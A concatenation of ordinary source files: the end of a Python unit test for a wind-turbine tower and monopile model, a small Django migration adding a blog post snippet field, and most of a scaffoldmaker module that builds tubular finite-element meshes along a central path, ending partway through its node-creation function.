npt.assert_equal(self.outputs["mIxy"], np.zeros(2))
npt.assert_equal(self.outputs["mIxz"], np.zeros(2))
npt.assert_equal(self.outputs["mIyz"], np.zeros(2))
npt.assert_equal(self.outputs["plidx"], np.array([12]))
npt.assert_equal(self.outputs["Fx"], np.array([2e5]))
npt.assert_equal(self.outputs["Fy"], np.array([3e5]))
npt.assert_equal(self.outputs["Fz"], np.array([4e5]))
npt.assert_equal(self.outputs["Mxx"], np.array([2e6]))
npt.assert_equal(self.outputs["Myy"], np.array([3e6]))
npt.assert_equal(self.outputs["Mzz"], np.array([4e6]))
# Test Monopile with GBF- TODO: THESE REACTIONS NEED THOUGHT
self.inputs["z_full"] = 10.0 * np.arange(-6, 7)
self.inputs["d_full"] = 6.0 * np.ones(self.inputs["z_full"].shape)
self.inputs["transition_piece_mass"] = 1e3
self.inputs["transition_piece_cost"] = 1e4
self.inputs["transition_piece_height"] = 10.0
self.inputs["transition_piece_I"] = 1e3 * 9 * np.r_[0.5, 0.5, 1.0, np.zeros(3)]
self.inputs["gravity_foundation_I"] = 0.5 * 1e4 * 9 * np.r_[0.5, 0.5, 1.0, np.zeros(3)]
self.inputs["gravity_foundation_mass"] = 1e4
self.inputs["suctionpile_depth"] = 0.0
self.inputs["rna_F"] = 1e5 * np.arange(2,5)
self.inputs["rna_M"] = 1e6 * np.arange(2,5)
self.inputs["k_soil"] = (20.0 + np.arange(6))[np.newaxis, :] * np.ones((2, 6))
self.inputs["z_soil"] = np.r_[-30.0, 0.0]
myobj = tow.TowerPreFrame(n_height=5, n_refine=3, monopile=True, gravity_foundation=True)
myobj.compute(self.inputs, self.outputs)
npt.assert_equal(self.outputs["kidx"], np.array([0]))
npt.assert_equal(self.outputs["kx"], np.array([RIGID]))
npt.assert_equal(self.outputs["ky"], np.array([RIGID]))
npt.assert_equal(self.outputs["kz"], np.array([RIGID]))
npt.assert_equal(self.outputs["ktx"], np.array([RIGID]))
npt.assert_equal(self.outputs["kty"], np.array([RIGID]))
npt.assert_equal(self.outputs["ktz"], np.array([RIGID]))
npt.assert_equal(self.outputs["midx"], np.array([7, 0]))
npt.assert_equal(self.outputs["m"], np.array([1e3, 1e4]))
npt.assert_equal(self.outputs["mrhox"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoy"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoz"], np.zeros(2))
npt.assert_equal(self.outputs["mIxx"], np.array([1e3 * 9 * 0.5, 1e4 * 9 * 0.25]))
npt.assert_equal(self.outputs["mIyy"], np.array([1e3 * 9 * 0.5, 1e4 * 9 * 0.25]))
npt.assert_equal(self.outputs["mIzz"], np.array([1e3 * 9, 1e4 * 9 * 0.5]))
npt.assert_equal(self.outputs["mIxy"], np.zeros(2))
npt.assert_equal(self.outputs["mIxz"], np.zeros(2))
npt.assert_equal(self.outputs["mIyz"], np.zeros(2))
npt.assert_equal(self.outputs["plidx"], np.array([12]))
npt.assert_equal(self.outputs["Fx"], np.array([2e5]))
npt.assert_equal(self.outputs["Fy"], np.array([3e5]))
npt.assert_equal(self.outputs["Fz"], np.array([4e5]))
npt.assert_equal(self.outputs["Mxx"], np.array([2e6]))
npt.assert_equal(self.outputs["Myy"], np.array([3e6]))
npt.assert_equal(self.outputs["Mzz"], np.array([4e6]))
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestStruct))
return suite
if __name__ == "__main__":
result = unittest.TextTestRunner().run(suite())
if result.wasSuccessful():
exit(0)
else:
exit(1)
|
# Generated by Django 3.2 on 2021-05-12 14:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_alter_post_content'),
]
operations = [
migrations.AddField(
model_name='post',
name='snippet',
field=models.CharField(default='Click on the button below to read about this blog post...', max_length=60),
),
]
|
'''
Utility function for generating tubular mesh from a central line
using a segment profile.
'''
from __future__ import division
import math
from opencmiss.utils.zinc.field import findOrCreateFieldCoordinates, findOrCreateFieldTextureCoordinates
from opencmiss.zinc.element import Element
from opencmiss.zinc.field import Field
from opencmiss.zinc.node import Node
from scaffoldmaker.annotation.annotationgroup import AnnotationGroup, mergeAnnotationGroups
from scaffoldmaker.utils.eftfactory_bicubichermitelinear import eftfactory_bicubichermitelinear
from scaffoldmaker.utils.eftfactory_tricubichermite import eftfactory_tricubichermite
from scaffoldmaker.utils.geometry import createCirclePoints
from scaffoldmaker.utils import interpolation as interp
from scaffoldmaker.utils import matrix
from scaffoldmaker.utils import vector
def getPlaneProjectionOnCentralPath(x, elementsCountAround, elementsCountAlong,
segmentLength, sx, sd1, sd2, sd12):
"""
    Projects the reference point used for warping onto the central path and finds
    coordinates and derivatives at the projected location.
:param x: coordinates of nodes.
:param elementsCountAround: number of elements around.
:param elementsCountAlong: number of elements along.
:param segmentLength: Length of segment.
:param sx: coordinates of equally spaced points on central path.
:param sd1: tangent of equally spaced points on central path.
:param sd2: derivative representing cross axis at equally spaced points on central path.
:param sd12: rate of change of cross axis at equally spaced points on central path.
    :return: coordinates and derivatives at projected points and z-coordinates of reference points.
"""
# Use first node in each group of elements along as reference for warping later
zRefList = []
for n2 in range(elementsCountAlong + 1):
zFirstNodeAlong = x[n2*elementsCountAround][2]
zRefList.append(zFirstNodeAlong)
# Find sx, sd1, sd2 at projection of reference points on central path
lengthElementAlong = segmentLength / elementsCountAlong
# Append values from first node on central path
sxRefList = []
sd1RefList = []
sd2RefList = []
sxRefList.append(sx[0])
sd1RefList.append(sd1[0])
sd2RefList.append(sd2[0])
# Interpolate the ones in between
for n2 in range(1, elementsCountAlong):
ei = int(zRefList[n2]//lengthElementAlong + 1)
xi = (zRefList[n2] - lengthElementAlong*(ei-1))/lengthElementAlong
sxRef = interp.interpolateCubicHermite(sx[ei - 1], sd1[ei - 1], sx[ei], sd1[ei], xi)
sd1Ref = interp.interpolateCubicHermiteDerivative(sx[ei - 1], sd1[ei - 1], sx[ei], sd1[ei], xi)
sd2Ref = interp.interpolateCubicHermite(sd2[ei - 1], sd12[ei - 1], sd2[ei], sd12[ei], xi)
sxRefList.append(sxRef)
sd1RefList.append(sd1Ref)
sd2RefList.append(sd2Ref)
# Append values from last node on central path
sxRefList.append(sx[-1])
sd1RefList.append(sd1[-1])
sd2RefList.append(sd2[-1])
# Project sd2 to plane orthogonal to sd1
sd2ProjectedListRef = []
for n in range(len(sd2RefList)):
sd1Normalised = vector.normalise(sd1RefList[n])
dp = vector.dotproduct(sd2RefList[n], sd1Normalised)
dpScaled = [dp * c for c in sd1Normalised]
sd2Projected = vector.normalise([sd2RefList[n][c] - dpScaled[c] for c in range(3)])
sd2ProjectedListRef.append(sd2Projected)
return sxRefList, sd1RefList, sd2ProjectedListRef, zRefList
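# Hedged illustration (not part of the original module): the projection above
# removes the tangential component of sd2, i.e. proj = normalise(sd2 - (sd2.t)t)
# for unit tangent t. A minimal worked example using the same vector helpers:
def _exampleProjectCrossAxis():
    sd1 = [0.0, 0.0, 2.0]  # tangent along z
    sd2 = [1.0, 0.0, 1.0]  # cross axis with a spurious tangential component
    t = vector.normalise(sd1)
    dp = vector.dotproduct(sd2, t)
    # subtracting the tangential component leaves [1.0, 0.0, 0.0]
    return vector.normalise([sd2[c] - dp * t[c] for c in range(3)])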
def warpSegmentPoints(xList, d1List, d2List, segmentAxis,
sx, sd1, sd2, elementsCountAround, elementsCountAlongSegment,
refPointZ, innerRadiusAlong, closedProximalEnd):
"""
Warps points in segment to account for bending and twisting
along central path defined by nodes sx and derivatives sd1 and sd2.
:param xList: coordinates of segment points.
:param d1List: derivatives around axis of segment.
:param d2List: derivatives along axis of segment.
:param segmentAxis: axis perpendicular to segment plane.
:param sx: coordinates of points on central path.
:param sd1: derivatives of points along central path.
:param sd2: derivatives representing cross axes.
:param elementsCountAround: Number of elements around segment.
:param elementsCountAlongSegment: Number of elements along segment.
:param refPointZ: z-coordinate of reference point for each element
groups along the segment to be used for transformation.
:param innerRadiusAlong: radius of segment along length.
:param closedProximalEnd: True if proximal end of segment is a closed end.
    :return: coordinates and derivatives of warped points.
"""
xWarpedList = []
d1WarpedList = []
d2WarpedList = []
d2WarpedListFinal = []
d3WarpedUnitList = []
for nAlongSegment in range(elementsCountAlongSegment + 1):
xElementAlongSegment = xList[elementsCountAround*nAlongSegment: elementsCountAround*(nAlongSegment+1)]
d1ElementAlongSegment = d1List[elementsCountAround*nAlongSegment: elementsCountAround*(nAlongSegment+1)]
d2ElementAlongSegment = d2List[elementsCountAround*nAlongSegment: elementsCountAround*(nAlongSegment+1)]
centroid = [0.0, 0.0, refPointZ[nAlongSegment]]
# Rotate to align segment axis with tangent of central line
unitTangent = vector.normalise(sd1[nAlongSegment])
cp = vector.crossproduct3(segmentAxis, unitTangent)
dp = vector.dotproduct(segmentAxis, unitTangent)
        if vector.magnitude(cp) > 0.0:  # path tangent not parallel to segment axis
axisRot = vector.normalise(cp)
thetaRot = math.acos(vector.dotproduct(segmentAxis, unitTangent))
rotFrame = matrix.getRotationMatrixFromAxisAngle(axisRot, thetaRot)
centroidRot = [rotFrame[j][0]*centroid[0] + rotFrame[j][1]*centroid[1] + rotFrame[j][2]*centroid[2] for j in range(3)]
else: # path tangent parallel to segment axis (z-axis)
if dp == -1.0: # path tangent opposite direction to segment axis
thetaRot = math.pi
axisRot = [1.0, 0, 0]
rotFrame = matrix.getRotationMatrixFromAxisAngle(axisRot, thetaRot)
centroidRot = [rotFrame[j][0] * centroid[0] + rotFrame[j][1] * centroid[1] + rotFrame[j][2] * centroid[2] for j in range(3)]
else: # segment axis in same direction as unit tangent
rotFrame = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
centroidRot = centroid
translateMatrix = [sx[nAlongSegment][j] - centroidRot[j] for j in range(3)]
for n1 in range(elementsCountAround):
x = xElementAlongSegment[n1]
d1 = d1ElementAlongSegment[n1]
d2 = d2ElementAlongSegment[n1]
            if vector.magnitude(cp) > 0.0:  # path tangent not parallel to segment axis
xRot1 = [rotFrame[j][0]*x[0] + rotFrame[j][1]*x[1] + rotFrame[j][2]*x[2] for j in range(3)]
d1Rot1 = [rotFrame[j][0]*d1[0] + rotFrame[j][1]*d1[1] + rotFrame[j][2]*d1[2] for j in range(3)]
d2Rot1 = [rotFrame[j][0]*d2[0] + rotFrame[j][1]*d2[1] + rotFrame[j][2]*d2[2] for j in range(3)]
# xTranslate = [xRot1[j] + translateMatrix[j] for j in range(3)]
else: # path tangent parallel to segment axis
xRot1 = [rotFrame[j][0]*x[0] + rotFrame[j][1]*x[1] + rotFrame[j][2]*x[2] for j in range(3)] if dp == -1.0 else x
d1Rot1 = [rotFrame[j][0]*d1[0] + rotFrame[j][1]*d1[1] + rotFrame[j][2]*d1[2] for j in range(3)] if dp == -1.0 else d1
d2Rot1 = [rotFrame[j][0]*d2[0] + rotFrame[j][1]*d2[1] + rotFrame[j][2]*d2[2] for j in range(3)] if dp == -1.0 else d2
# xTranslate = [xRot1[j] + translateMatrix[j] for j in range(3)]
if n1 == 0: # Find angle between xCentroidRot and first node in the face
vectorToFirstNode = [xRot1[c] - centroidRot[c] for c in range(3)]
if vector.magnitude(vectorToFirstNode) > 0.0:
cp = vector.crossproduct3(vector.normalise(vectorToFirstNode), vector.normalise(sd2[nAlongSegment]))
if vector.magnitude(cp) > 1e-7:
cp = vector.normalise(cp)
signThetaRot2 = vector.dotproduct(unitTangent, cp)
thetaRot2 = math.acos(
vector.dotproduct(vector.normalise(vectorToFirstNode), sd2[nAlongSegment]))
axisRot2 = unitTangent
rotFrame2 = matrix.getRotationMatrixFromAxisAngle(axisRot2, signThetaRot2*thetaRot2)
else:
rotFrame2 = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
else:
rotFrame2 = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
xRot2 = [rotFrame2[j][0]*xRot1[0] + rotFrame2[j][1]*xRot1[1] + rotFrame2[j][2]*xRot1[2] for j in range(3)]
d1Rot2 = [rotFrame2[j][0]*d1Rot1[0] + rotFrame2[j][1]*d1Rot1[1] + rotFrame2[j][2]*d1Rot1[2] for j in range(3)]
d2Rot2 = [rotFrame2[j][0]*d2Rot1[0] + rotFrame2[j][1]*d2Rot1[1] + rotFrame2[j][2]*d2Rot1[2] for j in range(3)]
xTranslate = [xRot2[j] + translateMatrix[j] for j in range(3)]
xWarpedList.append(xTranslate)
d1WarpedList.append(d1Rot2)
d2WarpedList.append(d2Rot2)
# Scale d2 with curvature of central path
d2WarpedListScaled = []
vProjectedList = []
for nAlongSegment in range(elementsCountAlongSegment + 1):
for n1 in range(elementsCountAround):
n = nAlongSegment * elementsCountAround + n1
# Calculate norm
sd1Normalised = vector.normalise(sd1[nAlongSegment])
v = [xWarpedList[n][c] - sx[nAlongSegment][c] for c in range(3)]
dp = vector.dotproduct(v, sd1Normalised)
dpScaled = [dp * c for c in sd1Normalised]
vProjected = [v[c] - dpScaled[c] for c in range(3)]
vProjectedList.append(vProjected)
            if vector.magnitude(vProjected) > 0.0:
                vProjectedNormalised = vector.normalise(vProjected)
            else:
                vProjectedNormalised = [0.0, 0.0, 0.0]
            # Calculate curvature along the segment at each node
            if nAlongSegment == 0:
                curvature = interp.getCubicHermiteCurvature(sx[0], sd1[0], sx[1], sd1[1], vProjectedNormalised, 0.0)
            elif nAlongSegment == elementsCountAlongSegment:
                curvature = interp.getCubicHermiteCurvature(sx[-2], sd1[-2], sx[-1], sd1[-1], vProjectedNormalised, 1.0)
            else:
                curvature = 0.5 * (interp.getCubicHermiteCurvature(sx[nAlongSegment - 1], sd1[nAlongSegment - 1],
                                                                   sx[nAlongSegment], sd1[nAlongSegment],
                                                                   vProjectedNormalised, 1.0) +
                                   interp.getCubicHermiteCurvature(sx[nAlongSegment], sd1[nAlongSegment],
                                                                   sx[nAlongSegment + 1], sd1[nAlongSegment + 1],
                                                                   vProjectedNormalised, 0.0))
# Scale
factor = 1.0 - curvature * innerRadiusAlong[nAlongSegment]
d2 = [factor * c for c in d2WarpedList[n]]
d2WarpedListScaled.append(d2)
# Smooth d2 for segment
smoothd2Raw = []
for n1 in range(elementsCountAround):
nx = []
nd2 = []
for n2 in range(elementsCountAlongSegment + 1):
n = n2*elementsCountAround + n1
nx.append(xWarpedList[n])
nd2.append(d2WarpedListScaled[n])
smoothd2 = interp.smoothCubicHermiteDerivativesLine(nx, nd2, fixStartDerivative = True, fixEndDerivative = True)
smoothd2Raw.append(smoothd2)
# Re-arrange smoothd2
for n2 in range(elementsCountAlongSegment + 1):
for n1 in range(elementsCountAround):
d2WarpedListFinal.append(smoothd2Raw[n1][n2])
# Calculate unit d3
for n in range(len(xWarpedList)):
d3Unit = vector.normalise(vector.crossproduct3(vector.normalise(d1WarpedList[n]),
vector.normalise(d2WarpedListFinal[n])))
d3WarpedUnitList.append(d3Unit)
return xWarpedList, d1WarpedList, d2WarpedListFinal, d3WarpedUnitList
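# Hedged sketch (illustrative only): the first rotation in warpSegmentPoints
# aligns the segment axis with the path tangent by an axis-angle rotation.
# Aligning the z-axis with the x-axis, for example, rotates by pi/2 about y:
def _exampleAlignSegmentAxis():
    segmentAxis = [0.0, 0.0, 1.0]
    unitTangent = [1.0, 0.0, 0.0]
    axisRot = vector.normalise(vector.crossproduct3(segmentAxis, unitTangent))
    thetaRot = math.acos(vector.dotproduct(segmentAxis, unitTangent))
    rotFrame = matrix.getRotationMatrixFromAxisAngle(axisRot, thetaRot)
    # applying rotFrame to segmentAxis recovers unitTangent (up to rounding)
    return [rotFrame[j][0] * segmentAxis[0] + rotFrame[j][1] * segmentAxis[1] +
            rotFrame[j][2] * segmentAxis[2] for j in range(3)]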
def getCoordinatesFromInner(xInner, d1Inner, d2Inner, d3Inner,
wallThicknessList, relativeThicknessList, elementsCountAround,
elementsCountAlong, elementsCountThroughWall, transitElementList):
"""
Generates coordinates from inner to outer surface using coordinates
and derivatives of inner surface.
:param xInner: Coordinates on inner surface
:param d1Inner: Derivatives on inner surface around tube
:param d2Inner: Derivatives on inner surface along tube
:param d3Inner: Derivatives on inner surface through wall
:param wallThicknessList: Wall thickness for each element along tube
:param relativeThicknessList: Relative wall thickness for each element through wall
:param elementsCountAround: Number of elements around tube
:param elementsCountAlong: Number of elements along tube
:param elementsCountThroughWall: Number of elements through tube wall
:param transitElementList: stores true if element around is a transition
element that is between a big and a small element.
    :return: nodes and derivatives for mesh, and curvature along inner surface.
"""
xOuter = []
curvatureAroundInner = []
curvatureAlong = []
curvatureList = []
xList = []
d1List = []
d2List = []
d3List = []
if relativeThicknessList:
xi3 = 0.0
xi3List = [0.0]
for n3 in range(elementsCountThroughWall):
xi3 += relativeThicknessList[n3]
xi3List.append(xi3)
relativeThicknessList.append(relativeThicknessList[-1])
for n2 in range(elementsCountAlong + 1):
wallThickness = wallThicknessList[n2]
for n1 in range(elementsCountAround):
n = n2*elementsCountAround + n1
norm = d3Inner[n]
# Calculate outer coordinates
x = [xInner[n][i] + norm[i]*wallThickness for i in range(3)]
xOuter.append(x)
# Calculate curvature along elements around
prevIdx = n - 1 if (n1 != 0) else (n2 + 1)*elementsCountAround - 1
nextIdx = n + 1 if (n1 < elementsCountAround - 1) else n2*elementsCountAround
kappam = interp.getCubicHermiteCurvatureSimple(xInner[prevIdx], d1Inner[prevIdx], xInner[n], d1Inner[n], 1.0)
kappap = interp.getCubicHermiteCurvatureSimple(xInner[n], d1Inner[n], xInner[nextIdx], d1Inner[nextIdx], 0.0)
if not transitElementList[n1] and not transitElementList[(n1-1)%elementsCountAround]:
curvatureAround = 0.5*(kappam + kappap)
elif transitElementList[n1]:
curvatureAround = kappam
elif transitElementList[(n1-1)%elementsCountAround]:
curvatureAround = kappap
curvatureAroundInner.append(curvatureAround)
# Calculate curvature along
if n2 == 0:
curvature = interp.getCubicHermiteCurvature(xInner[n], d2Inner[n], xInner[n + elementsCountAround],
d2Inner[n + elementsCountAround],
vector.normalise(d3Inner[n]), 0.0)
elif n2 == elementsCountAlong:
curvature = interp.getCubicHermiteCurvature(xInner[n - elementsCountAround],
d2Inner[n - elementsCountAround],
xInner[n], d2Inner[n], vector.normalise(d3Inner[n]), 1.0)
else:
curvature = 0.5*(
interp.getCubicHermiteCurvature(xInner[n - elementsCountAround], d2Inner[n - elementsCountAround],
xInner[n], d2Inner[n], vector.normalise(d3Inner[n]), 1.0) +
interp.getCubicHermiteCurvature(xInner[n], d2Inner[n],
xInner[n + elementsCountAround], d2Inner[n + elementsCountAround],
vector.normalise(d3Inner[n]), 0.0))
curvatureAlong.append(curvature)
for n3 in range(elementsCountThroughWall + 1):
xi3 = xi3List[n3] if relativeThicknessList else 1.0/elementsCountThroughWall * n3
for n1 in range(elementsCountAround):
n = n2*elementsCountAround + n1
norm = d3Inner[n]
innerx = xInner[n]
outerx = xOuter[n]
dWall = [wallThickness*c for c in norm]
# x
x = interp.interpolateCubicHermite(innerx, dWall, outerx, dWall, xi3)
xList.append(x)
# dx_ds1
factor = 1.0 + wallThickness*xi3 * curvatureAroundInner[n]
d1 = [ factor*c for c in d1Inner[n]]
d1List.append(d1)
# dx_ds2
curvature = curvatureAlong[n]
distance = vector.magnitude([x[i] - xInner[n][i] for i in range(3)])
factor = 1.0 - curvature*distance
d2 = [ factor*c for c in d2Inner[n]]
d2List.append(d2)
curvatureList.append(curvature)
#dx_ds3
d3 = [c * wallThickness * (relativeThicknessList[n3] if relativeThicknessList else 1.0/elementsCountThroughWall) for c in norm]
d3List.append(d3)
return xList, d1List, d2List, d3List, curvatureList
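# Hedged worked example of the curvature scaling above: with inner curvature
# kappa = 0.1 and a point a distance 0.5 outside the inner surface, d1 scales
# by factor = 1.0 + 0.5 * 0.1 = 1.05 and d2 by factor = 1.0 - 0.1 * 0.5 = 0.95,
# matching 1.0 + wallThickness * xi3 * curvatureAroundInner[n] and
# 1.0 - curvature * distance in the loops above (the opposite signs follow the
# original code's curvature sign conventions around versus along the tube).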
def createFlatCoordinates(xiList, lengthAroundList, totalLengthAlong, wallThickness, relativeThicknessList,
elementsCountAround, elementsCountAlong, elementsCountThroughWall, transitElementList):
"""
Calculates flat coordinates for a tube when it is opened into a flat preparation.
:param xiList: List containing xi for each point around the outer surface of the tube.
:param lengthAroundList: List of total arclength around the outer surface for each element along.
:param totalLengthAlong: Total length along tube.
    :param wallThickness: Thickness of wall.
    :param relativeThicknessList: Relative wall thickness for each element through wall.
:param elementsCountAround: Number of elements around tube.
:param elementsCountAlong: Number of elements along tube.
:param elementsCountThroughWall: Number of elements through wall.
:param transitElementList: stores true if element around is a
transition element between a big and small element.
:return: coordinates and derivatives of flat coordinates field.
"""
if relativeThicknessList:
xi3 = 0.0
xi3List = [0.0]
for n3 in range(elementsCountThroughWall):
xi3 += relativeThicknessList[n3]
xi3List.append(xi3)
relativeThicknessList.append(relativeThicknessList[-1])
# Calculate flat coordinates and derivatives
xFlatList = []
d1FlatList = []
d2FlatList = []
for n2 in range(elementsCountAlong + 1):
xiFace = xiList[n2]
lengthAround = lengthAroundList[n2]
d1List = []
for n1 in range(len(xiFace)):
d1 = (xiFace[n1] - xiFace[n1-1]) if n1 > 0 else (xiFace[n1+1] - xiFace[n1])
d1List.append(d1)
# To modify derivative along transition elements
for i in range(len(transitElementList)):
if transitElementList[i]:
d1List[i+1] = d1List[i+2]
xPad = (lengthAroundList[0] - lengthAround)*0.5
for n3 in range(elementsCountThroughWall + 1):
z = wallThickness * (xi3List[n3] if relativeThicknessList else 1.0 / elementsCountThroughWall * n3)
for n1 in range(elementsCountAround + 1):
xFlat = [xPad + xiFace[n1] * lengthAround,
totalLengthAlong / elementsCountAlong * n2,
z]
d1Flat = [ d1List[n1]*lengthAround, 0.0, 0.0 ]
xFlatList.append(xFlat)
d1FlatList.append(d1Flat)
for n2 in range(elementsCountAlong):
for n3 in range(elementsCountThroughWall + 1):
for n1 in range(elementsCountAround + 1 ):
nodeIdx = n2*(elementsCountAround + 1)*(elementsCountThroughWall + 1) + n3*(elementsCountAround + 1) + n1
nodeNextElementAlong = nodeIdx + (elementsCountAround+1)*(elementsCountThroughWall + 1)
# print(nodeIdx + 1, nodeNextElementAlong + 1)
v1 = xFlatList[nodeNextElementAlong]
v2 = xFlatList[nodeIdx]
d1 = d2 = [v1[i] - v2[i] for i in range(3)]
arclength = interp.computeCubicHermiteArcLength(v1, d1, v2, d2, True)
d2Flat = vector.setMagnitude(d1, arclength)
d2FlatList.append(d2Flat)
d2FlatList = d2FlatList + d2FlatList[-(elementsCountAround+1)*(elementsCountThroughWall+1):]
return xFlatList, d1FlatList, d2FlatList
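# Hedged reading of the duplication above: d2Flat for interior faces is the
# vector to the matching node one element along, rescaled to the cubic Hermite
# arc length of that span; the final face has no further face to difference
# against, so its derivatives are copied from the last
# (elementsCountAround + 1) * (elementsCountThroughWall + 1) entries.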
def createOrganCoordinates(xiList, relativeThicknessList, lengthToDiameterRatio, wallThicknessToDiameterRatio,
elementsCountAround, elementsCountAlong, elementsCountThroughWall, transitElementList):
"""
Calculates organ coordinates and derivatives represented by a cylindrical tube with a unit inner diameter,
length equivalent to lengthToDiameterRatio and wall thickness of wallThicknessToDiameterRatio.
:param xiList: List containing xi for each point around the outer surface of the tube.
:param relativeThicknessList: Relative thickness of each element through wall for organ coordinates.
:param lengthToDiameterRatio: Ratio of total length along organ to inner diameter of organ
:param wallThicknessToDiameterRatio: Ratio of wall thickness to inner diameter of organ.
:param elementsCountAround: Number of elements around tube.
:param elementsCountAlong: Number of elements along tube.
:param elementsCountThroughWall: Number of elements through wall.
:param transitElementList: stores true if element around is a transition element between a big and small element.
:return: coordinates and derivatives of organ coordinates field.
"""
if relativeThicknessList:
xi3 = 0.0
xi3List = [0.0]
for n3 in range(elementsCountThroughWall):
xi3 += relativeThicknessList[n3]
xi3List.append(xi3)
relativeThicknessList.append(relativeThicknessList[-1])
# Calculate organ coordinates and derivatives
xOrganList = []
d1OrganList = []
d2OrganList = []
d2 = [0.0, lengthToDiameterRatio / elementsCountAlong, 0.0]
for n2 in range(elementsCountAlong + 1):
cx = [0.0, lengthToDiameterRatio / elementsCountAlong * n2, 0.0]
xiFace = xiList[n2]
for n3 in range(elementsCountThroughWall + 1):
xi3 = xi3List[n3] if relativeThicknessList else 1.0/elementsCountThroughWall * n3
radius = 0.5 + wallThicknessToDiameterRatio * xi3
axis1 = [0.0, 0.0, radius]
axis2 = [radius, 0.0, 0.0]
d1List = []
for n1 in range(len(xiFace) - 1):
dTheta = (xiFace[n1 + 1 if n1 < len(xiFace) - 1 else 0] - xiFace[n1]) * 2.0 * math.pi
radiansAround = 2.0 * math.pi * xiFace[n1]
cosRadiansAround = math.cos(radiansAround)
sinRadiansAround = math.sin(radiansAround)
xOrganList.append([(cx[c] + cosRadiansAround * axis1[c] + sinRadiansAround * axis2[c]) for c in range(3)])
d1List.append([ dTheta*(-sinRadiansAround*axis1[c] + cosRadiansAround*axis2[c]) for c in range(3) ])
d2OrganList.append(d2)
# To modify derivative along transition elements
for i in range(len(transitElementList)):
if transitElementList[i]:
d1List[i] = vector.setMagnitude(d1List[i], vector.magnitude(d1List[i - 1]))
d1List[i + 1] = vector.setMagnitude(d1List[i+ 1], vector.magnitude(d1List[(i + 2) % elementsCountAround]))
d1OrganList += d1List
return xOrganList, d1OrganList, d2OrganList
def createNodesAndElements(region,
x, d1, d2, d3,
xFlat, d1Flat, d2Flat,
xOrgan, d1Organ, d2Organ, organCoordinateFieldName,
elementsCountAround, elementsCountAlong, elementsCountThroughWall,
annotationGroupsAround, annotationGroupsAlong, annotationGroupsThroughWall,
firstNodeIdentifier, firstElementIdentifier,
useCubicHermiteThroughWall, useCrossDerivatives, closedProximalEnd):
"""
Create nodes and elements for the coordinates and flat coordinates fields.
:param x, d1, d2, d3: coordinates and derivatives of coordinates field.
:param xFlat, d1Flat, d2Flat, d3Flat: coordinates and derivatives of
flat coordinates field.
:param xOrgan, d1Organ, d2Organ, d3Organ, organCoordinateFieldName: coordinates, derivatives and name of organ
coordinates field.
:param elementsCountAround: Number of elements around tube.
:param elementsCountAlong: Number of elements along tube.
:param elementsCountThroughWall: Number of elements through wall.
:param annotationGroupsAround: Annotation groups of elements around.
:param annotationGroupsAlong: Annotation groups of elements along.
:param annotationGroupsThroughWall: Annotation groups of elements through wall.
:param firstNodeIdentifier, firstElementIdentifier: first node and
element identifier to use.
    :param useCubicHermiteThroughWall: use linear interpolation through the wall when False.
    :param useCrossDerivatives: use cross derivatives when True.
:return nodeIdentifier, elementIdentifier, allAnnotationGroups
"""
nodeIdentifier = firstNodeIdentifier
elementIdentifier = firstElementIdentifier
zero = [ 0.0, 0.0, 0.0 ]
fm = region.getFieldmodule()
fm.beginChange()
cache = fm.createFieldcache()
# Coordinates field
coordinates = findOrCreateFieldCoordinates(fm)
nodes = fm.findNodesetByFieldDomainType(Field.DOMAIN_TYPE_NODES)
nodetemplate = nodes.createNodetemplate()
nodetemplate.defineField(coordinates)
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_VALUE, 1)
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D_DS1, 1)
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D_DS2, 1)
if useCrossDerivatives:
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D2_DS1DS2, 1)
if useCubicHermiteThroughWall:
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D_DS3, 1)
if useCrossDerivatives:
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D2_DS1DS3, 1)
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D2_DS2DS3, 1)
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D3_DS1DS2DS3, 1)
mesh = fm.findMeshByDimension(3)
if useCubicHermiteThroughWall:
eftfactory = eftfactory_tricubichermite(mesh, useCrossDerivatives)
else:
eftfactory = eftfactory_bicubichermitelinear(mesh, useCrossDerivatives)
eft = eftfactory.createEftBasic()
elementtemplate = mesh.createElementtemplate()
elementtemplate.setElementShapeType(Element.SHAPE_TYPE_CUBE)
result = elementtemplate.defineField(coordinates, -1, eft)
if xFlat:
# Flat coordinates field
bicubichermitelinear = eftfactory_bicubichermitelinear(mesh, useCrossDerivatives)
eftFlat1 = bicubichermitelinear.createEftBasic()
eftFlat2 = bicubichermitelinear.createEftOpenTube()
flatCoordinates = findOrCreateFieldCoordinates(fm, name="flat coordinates")
flatNodetemplate1 = nodes.createNodetemplate()
flatNodetemplate1.defineField(flatCoordinates)
flatNodetemplate1.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_VALUE, 1)
flatNodetemplate1.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D_DS1, 1)
flatNodetemplate1.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D_DS2, 1)
if useCrossDerivatives:
flatNodetemplate1.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D2_DS1DS2, 1)
flatNodetemplate2 = nodes.createNodetemplate()
flatNodetemplate2.defineField(flatCoordinates)
flatNodetemplate2.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_VALUE, 2)
flatNodetemplate2.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D_DS1, 2)
flatNodetemplate2.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D_DS2, 2)
if useCrossDerivatives:
flatNodetemplate2.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D2_DS1DS2, 2)
flatElementtemplate1 = mesh.createElementtemplate()
flatElementtemplate1.setElementShapeType(Element.SHAPE_TYPE_CUBE)
